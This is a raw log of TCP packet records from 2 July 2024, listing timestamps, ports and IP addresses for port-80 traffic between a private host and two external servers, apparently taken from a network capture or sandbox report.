Jul 2, 2024 00:05:08.035235882 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.035855055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035866022 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035880089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035890102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035900116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035911083 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035916090 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.035921097 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035931110 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035940886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035949945 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035953999 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.035953999 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.035963058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035979986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.035984993 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.035984993 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.035991907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036003113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036014080 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036026955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036030054 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036036968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036047935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036057949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036063910 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036063910 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036070108 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036081076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036092043 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036093950 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036093950 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036102057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036133051 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036156893 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036722898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036740065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036750078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036761045 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.036787033 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036787033 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036811113 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.036998987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037010908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037019968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037030935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037041903 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037051916 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037060976 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037061930 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037076950 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037079096 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037087917 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037100077 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037101030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037100077 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037112951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037122965 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037133932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037139893 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037144899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037156105 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037164927 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037175894 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037182093 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037182093 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037187099 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037197113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037199020 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037208080 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037220001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037223101 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037230968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037241936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037257910 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037257910 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037286997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037916899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037929058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037938118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037949085 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.037960052 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.037966967 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.037971020 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.037981033 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.037991047 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038001060 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038007021 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.038009882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038018942 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038022041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038038969 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038043976 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038052082 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038062096 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038072109 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038079023 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038079023 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038081884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038091898 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038103104 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038113117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038121939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038122892 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038132906 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038142920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038145065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038145065 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038152933 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038160086 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038180113 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038244963 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038784027 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038795948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038805008 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038816929 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.038855076 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.038855076 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.039028883 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039041042 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039052010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039062023 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039072037 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039082050 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.039082050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039093971 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039099932 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.039100885 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.039103985 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039113998 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039129972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039139986 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039150000 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039160013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039170980 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039181948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039186001 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.039186001 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.039194107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.039203882 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.039215088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.039225101 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.039225101 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.039225101 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.039235115 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.039244890 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.039254904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.039259911 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.039267063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.039285898 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.039309025 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.039974928 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039987087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.039997101 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040007114 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040018082 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040023088 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040029049 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040039062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040040970 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040050030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040059090 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040070057 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040079117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040086031 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040086031 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040095091 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040100098 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040106058 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040117025 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040127993 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040132046 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040138006 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040148973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040158987 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040169001 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040173054 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040173054 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040178061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040189028 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040199041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040206909 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040206909 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040210009 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040229082 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040235996 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040299892 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040884972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040895939 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.040906906 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.040916920 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.040939093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040939093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.040961981 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.040996075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041121006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041132927 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041143894 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041153908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041165113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041174889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041182995 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041182995 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041186094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041198969 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041208982 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041218996 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041229963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041233063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041233063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041240931 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041251898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041268110 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041269064 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041279078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041291952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041301966 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041301966 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041312933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041322947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041323900 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041323900 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041335106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041343927 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041353941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041356087 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041364908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041376114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.041387081 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041400909 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.041435957 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042036057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042047024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042056084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042067051 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042077065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042077065 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042088032 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042098045 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042109013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042110920 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042110920 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042119980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042130947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042140007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042150974 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042156935 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042169094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042171955 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042186022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042190075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042196989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.042207003 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042213917 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042216063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042227030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042237043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042246103 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042256117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042265892 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042268991 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.042270899 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.042275906 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042287111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042303085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.042303085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.042324066 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.042896032 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042907000 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.042924881 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.042948961 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043049097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043060064 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043070078 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.043080091 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.043091059 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.043100119 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043100119 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043111086 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043119907 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043126106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043129921 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.043135881 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043138027 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.043145895 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043155909 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043175936 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043186903 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043195009 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043205023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043210030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043212891 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043212891 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043220997 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043226957 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043231010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043242931 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043251991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043252945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043252945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043262005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043272972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043282032 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.043293953 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043318987 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.043349028 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.044071913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.044083118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.044094086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.044104099 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.044112921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.044123888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.044133902 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044137001 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.044137001 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.044138908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044148922 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044158936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044168949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044202089 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044202089 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044219017 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044223070 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.044224024 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044231892 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044243097 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044253111 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044260979 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044261932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044271946 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.044275999 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.044286013 CEST	80	49717	77.91.77.80	192.168.2.6
